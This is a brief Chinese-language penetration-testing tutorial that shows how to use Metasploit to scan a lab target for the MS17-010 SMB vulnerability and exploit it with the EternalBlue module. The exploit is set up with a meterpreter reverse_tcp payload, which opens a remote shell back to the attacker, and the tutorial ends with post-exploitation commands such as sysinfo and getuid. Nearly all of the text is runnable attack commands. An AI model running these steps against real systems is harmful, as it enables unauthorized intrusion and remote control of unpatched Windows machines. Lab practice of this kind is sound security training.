利用ms 17-010漏洞进行渗透
1.启动Metasploit
使用msfconsole命令启动终端
2.检查靶机是否存在ms17-010漏洞
搜索ms17-010相关的模块
search ms17-010
结果:
输入以下命令,使用ms17-010相关的模块对靶机进行漏洞扫描,确认是否存在ms17-010漏洞:
use auxiliary/scanner/smb/smb_ms17_010 //使用ms17-010模块
show options //查看该模块需要哪些参数
set RHOSTS [靶机IP] //设置目标主机的IP地址
run //执行
结果显示存在ms17-010漏洞!
3.利用ms17-010漏洞对靶机执行溢出攻击
输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:
use exploit/windows/smb/ms17_010_eternalblue //,使用ms17_010_eternalblue模块
set RHOSTS [靶机IP] //设置远程主机(靶机)的IP地址
set LHOST [操作机IP] // 设置本地主机(操作机)的IP地址
set payload windows/x64/meterpreter/reverse_tcp //使用 payload: meterpreter/reverse_tcp
set RPORT 445 //设置目标端口(靶机)
set target 0 //设置目标操作系统类型(此处为自动识别)
run //执行
溢出攻击成功后,会返回一个meterpreter提示符
4.渗透成功后meterpreterd的使用
sysinfo //查看系统信息
getuid //获取当前的用户id